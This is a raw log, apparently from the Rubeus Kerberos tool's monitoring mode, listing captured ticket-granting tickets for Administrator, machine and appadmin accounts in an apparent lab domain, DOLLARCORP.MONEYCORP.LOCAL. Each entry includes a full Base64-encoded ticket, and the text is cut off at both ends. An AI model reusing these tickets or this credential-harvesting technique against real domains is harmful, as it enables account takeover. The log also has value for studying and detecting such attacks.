On8g4raoenLCEXOh6i/JuO4bYJPyAkKtzrHYwTnfsopIuZMNi9FRLQO0dkfwHxcL51PUK2dY7UeYGkPLDCl/D5cgUPzDiYQQAG0rpQiUYWb+oDynXnoYYI1xaEgj/zAu+d4tafwbVsFTRQtW6zzampziYsWIaKSQH+WgUPsJQ2G2vHEueGvZXlHZvFD7zEcrHooJMxDj/RTAhAKATcM2lFS4p7B1qXArkdvgzYgPr8jZ/+yiYgWwyKSms1FOqgHPGOmcjXjXyHCmWlSK36v5uTZtdUc/aFNsH4VN8UU7RTK0WZ/DkmdWBgXcIayPhE4+/LYxmt6gXagxX256xmquakrrjlrAZbEA/XPl5iVvUYA8pwxTHAtkJqHYsd5h6XaoCkBhJiBGVNxdDBw9bscrympS58b6EpKxJPJ4AneLg4LdQoQiE3uqswu4pt6wywFasXO6zqI6Ni5WJeiFZRYCaajuhbDBBfSPIbff86nXJESInFHzAyHcIWtNMeiI5mvnDZEQbFYPp9GdQuVOBzVTZkBvRQA/ko+UBkssUuUPn/Dl6ULj6SFtwKpQaGDqd4i/MspR9odt/xd8j3N9jXBefM3D7JzTAaR0YA/47u1P4Ouf9IT9DV+YBquKLHkakDTFFH7ZfwamUtmFAfvgeNtvybLsR5KVXWK9uXJL3XyveeDaRXKAxAHgKdkqMfNv5pf72tftjp2axPsBXXNx1YMWJ5qfXAtxxUjHsTOEhk0ASKvEQRJWdUKhcJL7vKIEwdqngMnABFYMjNppqWF+IxfB8/+ygy98pG4wWHrD37/6oxXwlZn6cVN9vuDaKXokWw4cF/Rr5+2sKpRS/S3GvW+ytwBcuLyxHv0M7XYER2A5Kk8k173KCfNPLFjDX8uu0oxo4IBGjCCARagAwIBAKKCAQ0EggEJfYIBBTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgW1Swjb22zJ/ehWttUqFMyKWHI3oQJHDRoyd7V2/VCJGhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBgoQAApREYDzIwMjQwMzAyMjM1NzEyWqYRGA8yMDI0MDMwMzA5NTcxMlqnERgPMjAyNDAzMDkyMzU3MTJaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:56:12 PM
  EndTime               :  3/3/2024 1:56:12 AM
  RenewTill             :  3/9/2024 3:56:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:55:12 PM
  EndTime               :  3/3/2024 1:55:12 AM
  RenewTill             :  3/9/2024 3:55:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBNIwggTOoAMCARKhAwIBAqKCBMAEggS8spyK8GwCLqw+FeMIm+Q4F+h+YkKEhlR7MsZ13q7jCxPfAV0lIgh+N5SZvFjvLa4pAW0YNw+1zNqXenV3pusrmI0OTeLUoclGiIg4+x+B2SGVu062HOitdijTEvT4+TCPtwJ9WGWVKlKzUhBSXs1oL90LvDdmVhPS9+85GlgBbj1zLfkFkfVxyOur+/7jSvArN5vkzcj7xGdrd92oaRAO3Tj1wdk8IT4iPDzxDAz0FHImVdwphAi3waDfmikoUiH2ULm6A3Hqj57gW60Op6HplRMCOOz+1lKn3MqaE/ABWDpmVp2BbgaUEPCI9Cfd2+wnFvoqWhEK02bNz/TqEdp7WaN3bDHghWpHAbZ307SGBhVojYH85/VkzvfmalsJp6kw4tuWNzNBG5g6kRpL9C88nblHZBi4Sw303dqD6mKo2j38fHZTuGbp4I4R2otShx5HkSLAmTfQJx45Jru5KKhkeXfvieXfdnvChaQI7m3ckI4L1BL9mBX8aalN/CfaBgL1JwSi+MF6DgvO/lEzAG4GQd+Ze9R5hxkifTrILUBvbX4ryg9PG4h6xZXbUbcF+QwpcZ4f+9ns9mJhmqnp+ObLhOEcfNWmjwOmVpyINgb0IwCdmtp4rLJRDtdzicu5FY2QspA6KLS63f/FW8R37+WEfMbpIfGPIvtYymV4zYLDTG9SzgnSHe/8iDOeVpwXSU7PptuDK66aJL4ZROJDqBYhQ9YP/BMi3ToB3+Fisb7qAtFbVVeqgnrUEBslwy33YsMwnA+PCRqsKBNvateDezMm0TdVY1zff4soqjMksZwYoKpxpZ/weVXOMtG4R5Z6HAu8WE1jTaVesbqd0qrZ21PKxdN6gH/FjgdCUdPNYNFpaKhZHKJ8DDs7Gb6VT/qXPP+puNKxDYkfW2Q8Pysf5yWJ67Wtz5uugczJaj1YTEEt0aBRdLkwm4uw62jRh+byFCPAz2MFwhr5LkhsYU1nX7ZVddYXRoQu4l6YcpvYeCe6uovxRVIfObdDON99vfo4OwdoNPDXruE3m9lbo6p3mER3At0pkahNue/CQ63p1beNE3yGDsk9IVoEFnW9zZ6kZYoe5OkiqP/gPN6XcTdZ+G2ligwVwYSqNyMo2JMDeHzgKd/kM8EpXEAomBo5h+6SJ/eRXw7mRYkN+jWioxhozehgabivp0/q2uqwt3hxxKc5HByxNF8i+ZZF1OBdHgqmPqaRuhuXNn7SUbieaNTp0SL4MXExZLXOVXQkcRAEOtmWfam7cX2xG6uSvFZD8hjCwYNDLofcmG7AEfyeSe8LYBlYPk0hjUMY5M/vLZ/ge2U5N7GzVnB3QmmEPMj8hdsZTEMXJ+lP6sn4PFaT7E1H4wb9L3fPQ1Sn3mwKF7kz2+OssJFQ32NLiraMOERPK8du1tdJSk6D17ijRXm4fX9uPGYbNnYsA6onlyxw/WdP6R1GBuQVWTEM518TrbPY6xg1ZSfiqxCZr2Eko0rmIwEnJWVb99k7e/Y5rWcrNTkjU3nSiKbqYI4S/HBIcATX362lYY4+qhnqJxU7xx2B+G65LMjE/+pqsbi7hxpmjcI4nP5vCWW7ryCpqgOyjTHaKwp6cA8NF1hMPu9QfZlUbyRxo4IBGjCCARagAwIBAKKCAQ0EggEJfYIBBTCCAQGggf4wgfswgfigKzApoAMCARKhIgQgqHC9AnXHZ8CkD9eYG7pG/fkyzt68uxhi3nmh8Z2iza2hHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQGhETAPGw1BZG1pbmlzdHJhdG9yowcDBQBgoQAApREYDzIwMjQwMzAyMjM1NTEyWqYRGA8yMDI0MDMwMzA5NTUxMlqnERgPMjAyNDAzMDkyMzU1MTJaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTA==


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:53:12 PM
  EndTime               :  3/3/2024 1:53:12 AM
  RenewTill             :  3/9/2024 3:53:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:49:12 PM
  EndTime               :  3/3/2024 1:49:12 AM
  RenewTill             :  3/9/2024 3:49:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 6:47:37 AM
  EndTime               :  3/2/2024 4:47:37 PM
  RenewTill             :  3/9/2024 6:47:37 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

    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


[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:20:48 PM
  EndTime               :  3/3/2024 1:20:48 AM
  RenewTill             :  3/9/2024 5:35:48 AM
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  Base64EncodedTicket   :

    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

[*] Ticket cache size: 16


[*] 3/2/2024 11:58:12 PM UTC - Found new TGT:

  User                  :  [email protected]
  StartTime             :  3/2/2024 3:58:12 PM
  EndTime               :  3/3/2024 1:58:12 AM
  RenewTill             :  3/9/2024 3:58:12 PM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

